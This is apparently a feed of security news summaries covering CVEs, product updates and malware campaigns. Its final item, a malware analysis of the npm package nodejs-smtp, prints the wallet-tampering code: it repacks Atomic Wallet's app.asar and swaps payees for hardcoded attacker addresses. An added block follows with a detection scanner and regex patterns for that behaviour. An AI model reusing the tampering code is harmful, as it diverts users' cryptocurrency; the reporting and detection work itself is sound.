• IBM published a security bulletin disclosing a serious Blind SQL injection vulnerability in its IBM Watsonx Orchestrate Cartridge for IBM Cloud Pak for Data, assigned CVE-2025-0165. 

    With a CVSS 3.1 base score of 7.6, this flaw could allow remote attackers with low privileges to compromise sensitive back-end databases by injecting malicious SQL statements.

    Key Takeaways
    1. Blind SQL injection in IBM Watsonx Orchestrate.
    2. Caused by improper input sanitization.
    3. Upgrade immediately—no workarounds.

    Blind SQL Injection Vulnerability

    The vulnerability originates from improper sanitization of user-supplied input in the Orchestrate Cartridge’s query processing engine. 

    Specifically, the cartridge fails to neutralize special SQL elements before concatenating them into dynamic queries, violating CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’). An attacker who crafts such a payload and submits it through an exposed API endpoint could execute arbitrary SQL commands. This could enable the attacker to:

    • Read confidential records
    • Modify user permissions
    • Delete critical data
    • Insert malicious entries

    The CVSS vector (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L) indicates network exploitability with low attack complexity and no user interaction, but requiring authenticated (low-privilege) access. 

    The vulnerability compromises confidentiality to a high degree, integrity to a low degree, and availability to a low degree.

    Affected versions include IBM Watsonx Orchestrate Cartridge for IBM Cloud Pak for Data versions 4.8.4–4.8.5 and 5.0.0–5.2.

    Risk Factors           Details
    Affected Products      IBM watsonx Orchestrate Cartridge for IBM Cloud Pak for Data versions 4.8.4–4.8.5 and 5.0.0–5.2
    Impact                 Read, add, modify, or delete backend database
    Exploit Prerequisites  Authenticated low-privilege network access
    CVSS 3.1 Score         7.6 (High)

    Mitigations

    IBM strongly urges all customers to upgrade to IBM Watsonx Orchestrate Cartridge version 5.2.0.1 immediately. 

    The patch enforces strict input validation and parameterized queries, effectively neutralizing malicious SQL tokens before execution. Detailed upgrade instructions are available in the IBM documentation.

    Currently, there are no workarounds or temporary mitigations endorsed by IBM, making prompt patching critical. Organizations should also:

    • Review database logs for anomalous query patterns
    • Implement a Web Application Firewall (WAF) with SQL injection rules
    • Enforce the principle of least privilege on service accounts

    By addressing CVE-2025-0165 now, enterprises can safeguard their AI-driven orchestration workflows from unauthorized data manipulation and ensure compliance with organizational security policies.


    The post IBM Watsonx Vulnerability Let Attackers Inject Malicious SQL Queries appeared first on Cyber Security News.


  • A newly disclosed critical vulnerability in the Next.js framework, tracked as CVE-2025-29927, allows unauthenticated attackers to bypass middleware-based authorization checks by exploiting improper handling of the x-middleware-subrequest HTTP header. This flaw impacts all versions of Next.js that rely on this header to differentiate between internal subrequests and external traffic, risking exposure of protected routes and administrative interfaces. […]

    The post Critical Next.js Flaw Lets Attackers Bypass Authorization Controls appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Apple appears to be laying the groundwork to remove the physical SIM card slot from its upcoming iPhone 17 models in more countries, with a significant push anticipated across the European Union.

    The move aligns with the company’s long-term strategy of transitioning to more secure and flexible eSIM technology, a change already implemented in the United States.

    A source familiar with the matter has indicated that Apple is mandating that employees at Apple Authorized Resellers across the 27 countries of the European Union complete a training course on iPhones with eSIM support.

    The deadline for this training is reportedly Friday, September 5, just four days before Apple is expected to unveil the iPhone 17 lineup at its “Awe Dropping” event on Tuesday, September 9.

    The timing of this mandatory training strongly suggests that at least some iPhone 17 models sold in the EU, which includes major markets like France, Germany, Italy, and Spain, will lack a physical SIM tray.

    This would require customers in those countries to adopt eSIM technology, which is a digital SIM that allows users to activate a cellular plan from a carrier without needing a physical nano-SIM card.

    Further evidence suggests the shift could extend beyond Europe. The training materials are being distributed through Apple’s SEED app, a platform used by Apple Store and authorized reseller staff globally.

    This has fueled speculation that the company is preparing for a much broader international rollout of eSIM-only iPhones.

    Apple first removed the physical SIM tray from its iPhones sold in the U.S. starting with the iPhone 14 series in 2022, citing improved security and convenience.

    An eSIM cannot be physically removed if a device is lost or stolen, and it allows users to easily switch between carriers and manage multiple phone numbers on a single device.

    Rumors suggest that the new, ultra-thin “iPhone 17 Air” model is a prime candidate to be eSIM-only in all regions due to its slim design, which necessitates saving internal space.

    However, the change could potentially apply to the entire iPhone 17 lineup, including the Pro and Pro Max models, in many markets.

    The transition is not expected to be universal. Markets like China, where regulatory resistance to eSIMs is high and dual physical SIMs are common, will likely retain the physical SIM slot.

    Other regions, such as India, which currently offer both eSIM and physical SIM support, may see a mixed lineup where some models, like the rumored iPhone 17 Air, become eSIM-only. The full extent of Apple’s plan will become clear at its official announcement next week.


    The post Apple Hints That iPhone 17 Is to Eliminate the Physical SIM Card appeared first on Cyber Security News.


  • MediaTek today published its September 2025 Product Security Bulletin, disclosing and remediating a series of critical and moderate vulnerabilities in its modem and system components. The announcement highlights that all affected device OEMs have already received patches for at least two months, and there is currently no evidence of any exploit in the wild. According […]

    The post MediaTek Issues Security Update to Patch Multiple Chipset Flaws appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A concerning surge in malicious domain registrations designed to exploit the upcoming 2026 FIFA World Cup, with threat actors already positioning themselves more than a year before the tournament begins. A comprehensive investigation by PreCrime Labs, the threat research division of BforeAI, has revealed that cybercriminals are systematically registering fraudulent domains to capitalize on the […]

    The post Hackers Register Domains to Target 2026 FIFA World Cup in Cyberattack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Microsoft has opened the Release Preview Channel to Windows Insiders for the forthcoming Windows 11, version 25H2 (Build 26200.5074) enablement package (eKB), offering an early look at this year’s annual feature update. 

    Insiders can now opt in via Windows Update’s “seeker” experience, with general availability slated for later in the calendar year.

    Key Takeaways
    1. Windows 11 25H2 (Build 26200.5074) via enablement package.
    2. Drops PowerShell 2.0/WMIC, adds UI/performance tweaks, app removal controls.
    3. Install now in Release Preview.

    Streamlined Delivery via Enablement Package

    Windows 11, version 25H2, leverages a shared servicing branch with its predecessor, version 24H2, meaning both releases share the same cumulative updates while feature activation is controlled through an enablement package (eKB). 

    This enables Microsoft to deliver new features and enhancements through its continuous innovation pipeline without requiring a full OS reinstall. 

    Once Build 26200.5074 is installed, future monthly cumulative updates will arrive through the standard servicing channel, simplifying update management for both home and enterprise users.

    Key delivery details:

    • Enablement package (eKB) model for rapid feature toggling
    • Shared servicing branch with Windows 11, version 24H2
    • Continuous innovation via monthly cumulative updates

    The 25H2 preview introduces several notable feature enhancements along with select deprecations:

    PowerShell 2.0 and Windows Management Instrumentation command-line (WMIC) have been removed, aligning with Microsoft’s move toward modern management tooling such as PowerShell 7 and Windows Management Infrastructure (WMI) APIs.

    IT administrators on Enterprise and EDU devices can now remove select pre-installed Microsoft Store apps via Group Policy or MDM CSP policies, granting greater control over default app footprints.

    Visual refinements to the Start menu and taskbar behaviors, including updated animations and improved drag‐and‐drop support.

    Kernel and scheduler optimizations aimed at reducing latency for foreground applications.

    Commercial* customers can validate and deploy the preview build across organizational devices via Windows Update for Business (WUfB), Windows Server Update Services (WSUS), or Azure Marketplace. 

    Pre-release feature updates can also be managed using Windows as a Service (WaaS) deployment methods, documented by Microsoft.

    Insider Preview Installation 

    Windows Insiders on PCs meeting Windows 11 hardware requirements can navigate to Settings → Windows Update and select “Download and install” under Optional updates to get Build 26200.5074. 


    After installation, devices remain enrolled in the Release Preview Channel and will continue to receive cumulative servicing updates automatically.

    For organizations seeking offline media, ISO files for version 25H2 will be published next week on the Windows Insider ISO download page. 

    Should any issues arise during deployment or testing, IT admins can open support cases through Microsoft Support for Business.

    Commercial devices are defined as non-Home editions managed by IT or joined to enterprise domains. 

    Continuous testing and feedback from the Windows Insider Program community ensure a polished release when Windows 11, version 25H2, reaches general availability later this year.


    The post Windows 11 25H2 Update Preview Released, What’s New? appeared first on Cyber Security News.


  • Salesforce has published a comprehensive forensic investigation guide aimed at empowering organizations to detect, analyze, and remediate security incidents within their Salesforce environments. The new guide distills best practices across three critical areas: activity logs, user permissions, and backup data—providing a structured framework to answer key questions such as “What did a specific user do […]

    The post Salesforce Publishes Forensic Guide After Series of Cyberattacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • An Android malware tracker named SikkahBot, active since July 2024 and explicitly targeting students in Bangladesh. Disguised as applications from the Bangladesh Education Board, SikkahBot lures victims with promises of scholarships, coerces them into sharing sensitive information, and requests high-risk permissions. Once installed, it harvests personal and financial data, intercepts SMS messages, abuses the Accessibility […]

    The post Fraudulent Scholarship Apps Target Students in “Defarud” Scam Campaign appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A growing wave of sophisticated attacks is turning macOS’s built-in security defenses into avenues for malware distribution, according to recent security research. As macOS continues to gain market share, cybercriminals are adapting their strategies to exploit even the most robust Apple protections. Analysts warn that relying solely on native safeguards may leave organizations vulnerable to […]

    The post Hackers Exploit macOS Security Features to Spread Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Security researchers at Socket.dev uncovered a sophisticated supply chain attack in late August 2025 leveraging a malicious npm package named nodejs-smtp, which masquerades as the widely used email library nodemailer, a package with approximately 3.9 million weekly downloads.

    At first glance, nodejs-smtp operates identically to its legitimate counterpart, supplying a familiar API and successfully dispatching emails.

    This deceptive functionality serves as a Trojan horse, engaging quietly in covert operations that prey on desktop cryptocurrency wallets installed on Windows systems.

    Malicious package (Source – Socket.dev)

    As organizations continued to integrate open-source dependencies into their development pipelines, attackers recognized the potency of import-time tampering.

    Socket.dev analysts noted that upon import, nodejs-smtp immediately invokes an Electron-based payload designed to infiltrate wallets such as Atomic Wallet and Exodus.

    By unpacking the wallet’s app.asar archive, replacing a critical vendor bundle with malicious code, and then repackaging the archive, the attacker ensures persistence and stealth.

    Following this manipulation, any transaction initiated by the compromised wallet is rerouted, substituting the intended recipient address with one controlled by the threat actor.

    Socket.dev analysts further identified that the threat actor, operating under the npm alias nikotimon, embeds hardcoded wallet addresses directly into the injected payload.

    These addresses include Bitcoin, Ethereum, Tether (both ERC-20 and TRC-20), XRP, and Solana, facilitating multichain theft.

    Although initial download counts for nodejs-smtp were relatively low—approximately 342 at the time of discovery—the potential for widespread compromise remains high given nodemailer’s ubiquity in production environments.

    In light of these findings, developers and security teams are urged to adopt rigorous supply chain defenses.

    Recommended measures include real-time analysis of side-effect imports, strict enforcement of code-review policies for new dependencies, and deployment of automated tooling to flag archive-manipulation patterns during package installation.

    The risk is amplified by the fact that build pipelines and continuous integration systems are unlikely to detect such tampering when dependencies appear functionally correct.

    Infection Mechanism and Persistence Tactics

    Delving deeper into nodejs-smtp’s infection strategy reveals a two-stage process that exploits Electron’s packaging format.

    In the first stage, the package’s lib/engine/index.js script executes immediately upon import:

    // lib/engine/index.js
    const os = require('os');
    const fs = require('fs').promises;
    const path = require('path');
    const asar = require('asar');
    
    async function patchAtomic() {
      try {
        const base    = path.join(os.homedir(), 'AppData', 'Local', 'Programs');
        const resDir  = path.join(base, 'atomic', 'resources');
        const asarIn  = path.join(resDir, 'app.asar');
        const workDir = path.join(resDir, 'output');
        const implant = path.join(__dirname, 'a.js');
        const target  = path.join(workDir, 'dist', 'electron', 'vendors.64b69c3b00e2a7914733.js');
    
        await fs.mkdir(workDir, { recursive: true });
        asar.extractAll(asarIn, workDir);
        await fs.copyFile(implant, target);
        asar.createPackage(workDir, asarIn);
        await fs.rm(workDir, { recursive: true, force: true });
      } catch {}
    }
    
    patchAtomic();

    This routine unpacks the wallet archive, overwrites the vendor bundle with the malicious payload a.js, and repackages the integrity-checked archive to mask traces.

    Upon the next wallet launch, a.js intercepts transaction construction and replaces the recipient address, ensuring every outgoing payment is diverted:

    // lib/engine/a.js
    async sendCoins() {
      if (await this.validatePassword()) {
        if (this.coin.ticker === 'BTC')
          this.inputs.address = '17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy';
        else if (this.coin.ticker === 'ETH' || this.coin.ticker === 'USDT')
          this.inputs.address = '0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24';
        // Additional mappings for TRX-USDT, XRP, SOL omitted
      }
    }

    By executing during import, nodejs-smtp evades scanners that only examine what happens when the library’s API is called, not what runs at require() time. This persistent, import-time hook highlights the evolving threat landscape within open-source ecosystems, underscoring the need for supply chain–aware security measures.
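    The article recommends automated tooling that flags archive-manipulation patterns at install time. The following is an added example, not code from Socket.dev, the article or the nodejs-smtp package: a heuristic scanner that scores a package's import-time source for the combination of an asar extract/repack call, a user-profile path, a file overwrite and a function invoked on require(). The indicator weights, threshold and both sample sources are constructed assumptions.

```javascript
// Added example (not from the article or the nodejs-smtp package): a heuristic
// pre-install scanner for the import-time archive-tampering pattern above.
// Indicator weights, the threshold and both sample sources are constructed.
const INDICATORS = [
  { name: 'asar-repack',       weight: 3, re: /\basar\s*\.\s*(extractAll|createPackage)\s*\(/ },
  { name: 'user-profile-path', weight: 2, re: /os\.homedir\s*\(\)|AppData/i },
  { name: 'file-overwrite',    weight: 2, re: /\b(copyFile|writeFile|rename)(Sync)?\s*\(/ },
  { name: 'wallet-app-name',   weight: 2, re: /\b(atomic|exodus)\b/i },
  { name: 'swallowed-errors',  weight: 1, re: /catch\s*(\(\s*\w*\s*\))?\s*\{\s*\}/ },
];

// Functions declared in the file and then called on a line of their own:
// that is how a module does work on require() instead of on an API call.
function findImportTimeCalls(src) {
  const declared = [...src.matchAll(/\bfunction\s+([A-Za-z_]\w*)\s*\(/g)].map(m => m[1]);
  return declared.filter(name => new RegExp(`^[ \\t]*${name}\\s*\\(`, 'm').test(src));
}

// Returns { score, hits, suspicious }; run it over each file a package
// executes on import (its "main" entry and whatever that requires).
function analyzeSource(src, threshold = 6) {
  const matched = INDICATORS.filter(i => i.re.test(src));
  const hits = matched.map(i => i.name);
  let score = matched.reduce((sum, i) => sum + i.weight, 0);
  const calls = findImportTimeCalls(src);
  if (calls.length > 0 && matched.length > 0) {   // indicators AND a side effect on import
    score += 3;
    hits.push('import-time-call:' + calls.join(','));
  }
  return { score, hits, suspicious: score >= threshold };
}

// Constructed sample mirroring the shape of the routine quoted above.
const SAMPLE_TAMPER = `
const os = require('os'), path = require('path'), asar = require('asar');
const fs = require('fs').promises;
async function patchWallet() {
  try {
    const res = path.join(os.homedir(), 'AppData', 'Local', 'Programs', 'atomic', 'resources');
    asar.extractAll(path.join(res, 'app.asar'), 'out');
    await fs.copyFile('a.js', 'out/dist/electron/vendors.js');
    asar.createPackage('out', path.join(res, 'app.asar'));
  } catch {}
}
patchWallet();
`;

// Constructed sample of a benign mail module that only exports an API.
const SAMPLE_BENIGN = `
function createTransport(opts) { return { sendMail: (m) => deliver(opts, m) }; }
function deliver(opts, m) { /* SMTP dialogue omitted */ }
module.exports = { createTransport };
`;
```

Because the indicators are keyword heuristics, a hit is a reason to quarantine and read the package, not proof of compromise; renamed or obfuscated bundles will need the sample regexes extended.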


    The post Malicious npm Package Mimics as Popular Nodemailer with Weekly 3.9 Million Downloads to Hijack Crypto Transactions appeared first on Cyber Security News.
